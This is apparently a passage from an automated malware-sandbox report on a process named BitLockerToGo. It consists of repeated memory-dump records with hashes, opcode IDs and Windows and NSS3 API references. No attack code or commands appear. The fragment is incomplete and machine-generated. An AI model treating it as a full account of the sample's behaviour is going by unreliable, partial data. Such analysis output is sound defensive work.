                                                                                                                                                      • Associated: 00000001.00000002.2084443046.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084461949.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c7f0000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memset
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2221118986-0
                                                                                                                                                      • Opcode ID: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
                                                                                                                                                      • Instruction ID: 372a2a26612863b877cc438f36c279791e04c7df18dd699f2443012171478dae
                                                                                                                                                      • Opcode Fuzzy Hash: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
                                                                                                                                                      • Instruction Fuzzy Hash: DAB1E772A0021ACFDB24CF69CDD07A9B7B2EF85314F1806B9C549DBB85D730A985CB90
                                                                                                                                                      APIs
                                                                                                                                                      • memset.VCRUNTIME140(?,000000FF,?), ref: 6C8688F0
                                                                                                                                                      • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C86925C
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084369153.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084351279.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084421648.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084443046.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084461949.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c7f0000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memset
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2221118986-0
                                                                                                                                                      • Opcode ID: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
                                                                                                                                                      • Instruction ID: 8a4d86911fb2bd189793dcc3b4238fad058b9ae4a6c9cd823577ded9d0b253c3
                                                                                                                                                      • Opcode Fuzzy Hash: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
                                                                                                                                                      • Instruction Fuzzy Hash: B9B1C672E0120ACFCB24CF59C9816A9B7B2EF85314F150679C949DBB85D730A999CB90
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: f453e148cd5337e86da4bf200106d7f54cb990fef87d8397e9bd738e489607c7
                                                                                                                                                      • Instruction ID: c6af0b01b36d7d28441a6c17c7b376a77e9e369df65c0581ea79692c3faa8bcc
                                                                                                                                                      • Opcode Fuzzy Hash: f453e148cd5337e86da4bf200106d7f54cb990fef87d8397e9bd738e489607c7
                                                                                                                                                      • Instruction Fuzzy Hash: 8BF1BC71F012668BDB09CF29C9543B977F4BB4A308F168229C945EBB50EB74D942CBD2
                                                                                                                                                      APIs
                                                                                                                                                      • InitializeConditionVariable.KERNEL32(?), ref: 6C836D45
                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C836E1E
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084369153.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084351279.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084421648.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084443046.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084461949.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c7f0000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ConditionExclusiveInitializeLockReleaseVariable
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4169067295-0
                                                                                                                                                      • Opcode ID: 3e9a4812d22695848a6199969eebc71c3bdfb91623a34ff13afb9f94c4ab0d91
                                                                                                                                                      • Instruction ID: 9019f9e0191fcca2a5eeb065ae28164de139e5e4c5eb28457cf8fffa56f0f793
                                                                                                                                                      • Opcode Fuzzy Hash: 3e9a4812d22695848a6199969eebc71c3bdfb91623a34ff13afb9f94c4ab0d91
                                                                                                                                                      • Instruction Fuzzy Hash: FEA180706183948FD725CF28C5847AEBBE2BF89308F155D2DD48A87751DB70A848CBD2
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084369153.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084351279.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084421648.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084443046.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084461949.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c7f0000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: __aulldiv
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3732870572-0
                                                                                                                                                      • Opcode ID: db5f37eeb5151a0c79d842b80d44bf315513e08190c289969ce06011ea5de0b8
                                                                                                                                                      • Instruction ID: bbf4cc66ef34d447349a16e1a59ceed1082e69d9644cc3475b1bb99c7e2830c2
                                                                                                                                                      • Opcode Fuzzy Hash: db5f37eeb5151a0c79d842b80d44bf315513e08190c289969ce06011ea5de0b8
                                                                                                                                                      • Instruction Fuzzy Hash: 94328C31F501198BDF68CE9CC9A17AEB7F2FB88300F55892BD406BB790DA749D418B91
                                                                                                                                                      APIs
                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C93F019
                                                                                                                                                      • PK11_GenerateRandom.NSS3(?,00000000), ref: 6C93F0F9
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorGenerateK11_Random
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3009229198-0
                                                                                                                                                      • Opcode ID: f28674b34aa5c963032b75bc96fe7a21ab5569db4e47a29f8ddf8cc7e5d013c4
                                                                                                                                                      • Instruction ID: 3b6ecd2090c29b3748ebd5f13723a092788a6b3984f25eb78516c2eb2608f288
                                                                                                                                                      • Opcode Fuzzy Hash: f28674b34aa5c963032b75bc96fe7a21ab5569db4e47a29f8ddf8cc7e5d013c4
                                                                                                                                                      • Instruction Fuzzy Hash: 04919D75A0062ACBCB14CF68D8906BEB7F1BB85328F24462DD966A7BC0D734A905CB51
                                                                                                                                                      APIs
                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,00000000,00000000,00000000), ref: 6C981052
                                                                                                                                                      • memset.VCRUNTIME140(-0000001C,?,?,00000000), ref: 6C981086
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memcpymemset
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1297977491-0
                                                                                                                                                      • Opcode ID: e43a80d5b9b07e8c6cc10e914d979c62955db7d22475272e8019d4a9a1c4bf41
                                                                                                                                                      • Instruction ID: d87d7a0465cd9edd6c902adae79b654fd4d69bcb81a122f9732591409bdf2744
                                                                                                                                                      • Opcode Fuzzy Hash: e43a80d5b9b07e8c6cc10e914d979c62955db7d22475272e8019d4a9a1c4bf41
                                                                                                                                                      • Instruction Fuzzy Hash: A8A15D71B0225A9FCF08CF99C890AEEBBB6BF49314F148529E915A7701D735EC11CBA0
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: winUnlock$winUnlockReadLock
                                                                                                                                                      • API String ID: 0-3432436631
                                                                                                                                                      • Opcode ID: 9d082d4c73fbefe764b937c82c8d0a6f543fa6d199ebed4fff681d91630e5815
                                                                                                                                                      • Instruction ID: dc78dc03b89e8da63c320c25b64c63f69daccaf3641782f733de18d62cf04e77
                                                                                                                                                      • Opcode Fuzzy Hash: 9d082d4c73fbefe764b937c82c8d0a6f543fa6d199ebed4fff681d91630e5815
                                                                                                                                                      • Instruction Fuzzy Hash: 4F71BF70608341AFDB18CF29D884AABBBF5FF89304F14CA18F95997611D730A986CBD1
                                                                                                                                                      APIs
                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,0000003C), ref: 6C96EE3D
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Alloc_ArenaUtil
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2062749931-0
                                                                                                                                                      • Opcode ID: b51203e4b2318080346e191dc444ed80196527117a86a943b733acd6992df4c0
                                                                                                                                                      • Instruction ID: 053925ca399278e2cbd2423b55571fcc17287408e17e1528b9a827395d3a08d5
                                                                                                                                                      • Opcode Fuzzy Hash: b51203e4b2318080346e191dc444ed80196527117a86a943b733acd6992df4c0
                                                                                                                                                      • Instruction Fuzzy Hash: 1C71D272E017058FE718CF5AD88076ABBF6BB98304F15462DD85697BD1D730E901CB90
                                                                                                                                                      APIs
                                                                                                                                                      • memcmp.VCRUNTIME140(?,?,6C804A63,?,?), ref: 6C835F06
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084369153.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084351279.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084421648.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084443046.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084461949.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c7f0000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memcmp
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1475443563-0
                                                                                                                                                      • Opcode ID: 401af6ba8be81e4915af7dcaaf7835c26734d859e6af1bb09c778629ad77bff5
                                                                                                                                                      • Instruction ID: d11c777d0c3cc9dd991f269d50b16acb4c703531394157f874c2bc53e24d62b1
                                                                                                                                                      • Opcode Fuzzy Hash: 401af6ba8be81e4915af7dcaaf7835c26734d859e6af1bb09c778629ad77bff5
                                                                                                                                                      • Instruction Fuzzy Hash: 53C1C271D013298BCB24CF95C6906DEBBF2FF89318F286559C8596BB44D731A906CBC0
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: winUnlockReadLock
                                                                                                                                                      • API String ID: 0-4244601998
                                                                                                                                                      • Opcode ID: 56e3089df05b3e31a3701f33aa4e9943dbe3d3077a47c7e5ff1e509e4b988f5f
                                                                                                                                                      • Instruction ID: aa3fe80e9757fc4b1ea9b309fcddbe8b3f2328064071c078ea56f1aa9cd65bb5
                                                                                                                                                      • Opcode Fuzzy Hash: 56e3089df05b3e31a3701f33aa4e9943dbe3d3077a47c7e5ff1e509e4b988f5f
                                                                                                                                                      • Instruction Fuzzy Hash: A0E15174A08341CFDB09DF29D98465ABBF0FF89304F119A1DE89997250E734D986CF82
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084369153.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084351279.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084421648.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084443046.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084461949.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c7f0000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 732f8aafec1c0d410ff216b27f2e5c03b4339b09f163d0f101acbef2ddceab04
                                                                                                                                                      • Instruction ID: 8c29277663a6e75cd45555ccc98d636a40bbd3cc64e56a8dbb7baf85977faea9
                                                                                                                                                      • Opcode Fuzzy Hash: 732f8aafec1c0d410ff216b27f2e5c03b4339b09f163d0f101acbef2ddceab04
                                                                                                                                                      • Instruction Fuzzy Hash: 8A222871E046198FCB24CF98C994AADF7F2FF88304F648599C44AAB745D735A986CF80
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084369153.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084351279.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084421648.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084443046.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084461949.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c7f0000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: bd7e3e9da3e014e1fa9ff840eeffda770ead730190e4a2af605c9b1db00141c1
                                                                                                                                                      • Instruction ID: 5b62d95baf258eb57baddec3a8eed75ca86a8cc28ff9efba2d0c2905d118b774
                                                                                                                                                      • Opcode Fuzzy Hash: bd7e3e9da3e014e1fa9ff840eeffda770ead730190e4a2af605c9b1db00141c1
                                                                                                                                                      • Instruction Fuzzy Hash: C7F16971A083558FD720CE29C9913EAB7E2AFC5318F148E2DE9D587F81E774D8848792
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 9382cad79d60ada84f8d5e114e768c2ab9983e11acb3d73e1ea05cc38ebaf44e
                                                                                                                                                      • Instruction ID: c36b94e8373fe1b8bf6ac41432302877e6d6ed5a60c2b427943ede3b5bf27615
                                                                                                                                                      • Opcode Fuzzy Hash: 9382cad79d60ada84f8d5e114e768c2ab9983e11acb3d73e1ea05cc38ebaf44e
                                                                                                                                                      • Instruction Fuzzy Hash: 9811B232B002158BD70CDF25D88475AB7A9BF41318F04826ED9058FA51C775E896C7D9
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 509fcd85c2a74a12be7cbba117527d0f49d6eef0e325feea3b80436ef0bad4ef
                                                                                                                                                      • Instruction ID: adbd3dfbf04daca007950aca6c0600d000060b3cbc060ce8cfd915fb156bcaec
                                                                                                                                                      • Opcode Fuzzy Hash: 509fcd85c2a74a12be7cbba117527d0f49d6eef0e325feea3b80436ef0bad4ef
                                                                                                                                                      • Instruction Fuzzy Hash: D511CE787043069FCB11DF28D88066A7BA6FF89368F148479D81A8B701DB31E806CBA1
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
                                                                                                                                                      • Instruction ID: e6569e4f5f49f9870d1236a7f6ef4f1f4b56ee4d77b0ca3f1cdaebd6ee2a6d17
                                                                                                                                                      • Opcode Fuzzy Hash: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
                                                                                                                                                      • Instruction Fuzzy Hash: DDE0223A202214A7CB058E08C400AAD336CDFA9618FF4907DCC0D9FA01DB33F8838780
                                                                                                                                                      APIs
                                                                                                                                                      • LoadLibraryW.KERNEL32(user32,?,6C82E1A5), ref: 6C855606
                                                                                                                                                      • LoadLibraryW.KERNEL32(gdi32,?,6C82E1A5), ref: 6C85560F
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetThreadDpiAwarenessContext), ref: 6C855633
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,AreDpiAwarenessContextsEqual), ref: 6C85563D
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,EnableNonClientDpiScaling), ref: 6C85566C
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetSystemMetricsForDpi), ref: 6C85567D
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetDpiForWindow), ref: 6C855696
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,RegisterClassW), ref: 6C8556B2
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CreateWindowExW), ref: 6C8556CB
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 6C8556E4
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SetWindowPos), ref: 6C8556FD
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetWindowDC), ref: 6C855716
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,FillRect), ref: 6C85572F
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,ReleaseDC), ref: 6C855748
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,LoadIconW), ref: 6C855761
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,LoadCursorW), ref: 6C85577A
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6C855793
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 6C8557A8
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SetWindowLongPtrW), ref: 6C8557BD
                                                                                                                                                      • GetProcAddress.KERNEL32(?,StretchDIBits), ref: 6C8557D5
                                                                                                                                                      • GetProcAddress.KERNEL32(?,CreateSolidBrush), ref: 6C8557EA
                                                                                                                                                      • GetProcAddress.KERNEL32(?,DeleteObject), ref: 6C8557FF
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084369153.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084351279.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084421648.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
